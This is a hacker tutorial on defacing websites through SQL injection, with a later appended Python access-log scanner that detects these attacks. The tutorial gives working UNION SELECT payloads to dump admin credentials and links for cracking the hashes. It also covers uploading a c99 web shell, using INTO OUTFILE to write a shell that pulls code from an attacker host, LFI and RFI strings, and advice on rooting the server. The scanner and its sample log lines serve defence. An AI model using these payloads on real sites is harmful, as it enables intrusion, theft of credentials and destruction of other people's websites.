Library magazine
Okay, many people still want to know how to deface websites via SQL injection.
It's not always possible, but if you have a target, let's see what we can do.
Read below!

PS: You may think this document is small, but it's just that easy! ;)

There are many ways to deface websites, such as:
Keylogging the webmaster of the website you want to hack. Not an easy way!
You can try LFI (Local File Inclusion, for example script.php?page=../../../../etc/passwd%00).
Web-based applications: you can use milw0rm.com to check for vulnerabilities :) Thanks str0ke!
Also RFI (Remote File Inclusion, for example script.php?page=http://www.evil.com/shell.txt?).
XSS cookie grabbing and clickjacking.

But I will describe how to deface a website which is vulnerable to SQL injection!

Let's check out the simple way!
1. Find out the column and table names:
script.php?id=-1 union all select 1,2,3,4,5,group_concat(table_name) from 
information_schema.tables where table_schema=database()--
script.php?id=-1 union all select 1,2,3,4,5,group_concat(column_name) from 
information_schema.columns where table_schema=database()--

Okay, there is probably a table named admin_users, and 2 columns named admin_name and
admin_pass.

Let's get the data from it:
script.php?id=-1 union all select 1,2,3,4,5,group_concat(admin_name,0x3a,admin_pass),7,8,
9,10 from admin_users--

If it's a hash (32 characters), use http://www.gdataonline.com, http://www.tmto.org/search/
or http://www.milw0rm.com/cracker to crack the hash!

2. Log into the admin panel.

3. Try to find somewhere you can upload things, like albums or something,
because album/image folders are often writeable!

4. Upload a shell as .php (not .txt; use .txt when you do RFI (Remote File Inclusion), for example).
Now go to your uploaded shell, site.com/c99.php, and if it's possible, root it! (Check some
available exploits at milw0rm.com.)

5. Change the index.html/php/asp or w/e, if it's writeable, to your own choice! :D

How to deface via SQL injection when magic_quotes are on and you have found out the path of the
server (e.g. /home/www/site.com/public_html):
1. Use the infected column number, for example 7:
site.com/script.php?id=-1 union all select 1,2,3,4,5,6,"",8,9,10 INTO OUTFILE 
'/home/www/site.com/public_html/images/shell.php'--

Use /images/ because this dir is almost always writeable.
2. Now you can give parameters to shell.php, like:
http://www.site.com/images/shell.php?o=c...ls/c99.txt

This creates a file named c99.php with the content of
http://www.EVILSITE.COM/shells/c99.txt.

3. Guess!! Yes!!!! You can access your shell now via http://www.site.com/images/c99.php :D
Now go to your uploaded shell, site.com/images/c99.php, and if it's possible, root it! (Check
some available exploits at milw0rm.com.)

By ©Darkc0ke :)
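
Every request shape quoted above (UNION SELECT, information_schema enumeration, INTO OUTFILE, ../ traversal with %00, and a URL passed as a page parameter) leaves a recognisable trace in web server access logs. The scanner below is an added example, not part of the original article; the rule names, the combined-log-format assumption and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Rules mirror the request shapes quoted in the article (rule names are assumed).
RULES = {
    "sqli-union": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "sqli-schema-enum": re.compile(r"\binformation_schema\.(tables|columns)\b"),
    "sqli-file-write": re.compile(r"\binto\s+(out|dump)file\b"),
    "lfi-traversal": re.compile(r"(\.\./){2,}|\x00"),
    # Noisy where the app legitimately takes ?next=https://... ; tune per site.
    "rfi-remote-url": re.compile(r"=\s*(https?|ftp)://"),
}
# Assumes Apache/nginx combined log format: ip - - [time] "METHOD target PROTO" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')

def normalize(target):
    """Undo URL encoding (up to 3 layers), mixed case and /**/ used as spacing."""
    text = target
    for _ in range(3):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = re.sub(r"/\*.*?\*/", " ", text.lower())
    return re.sub(r"\s+", " ", text)

def scan(lines):
    """Return (line_no, client_ip, status, [rule names]) per suspicious request."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        ip, target, status = m.groups()
        text = normalize(target)
        hits = sorted(name for name, rx in RULES.items() if rx.search(text))
        if hits:
            findings.append((n, ip, int(status), hits))
    return findings

# Constructed sample lines (documentation IP ranges, made-up timestamps and sizes).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:01:02 +0000] "GET /script.php?id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:02:10 +0000] "GET /script.php?id=-1+union+all+select+1,2,3,4,5,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 5301',
    "203.0.113.9 - - [01/Jan/2024:10:03:44 +0000] \"GET /script.php?id=-1%20UNION/**/ALL/**/SELECT%201,2,3%20INTO%20OUTFILE%20'/tmp/x'-- HTTP/1.1\" 500 312",
    '198.51.100.4 - - [01/Jan/2024:10:05:00 +0000] "GET /script.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 1843',
    '198.51.100.4 - - [01/Jan/2024:10:05:09 +0000] "GET /script.php?page=http://www.evil.example/shell.txt? HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit with status 200 on the schema-enumeration or file-write rule deserves priority, since it suggests the query executed; the durable fix remains parameterized queries and a database account without the FILE privilege.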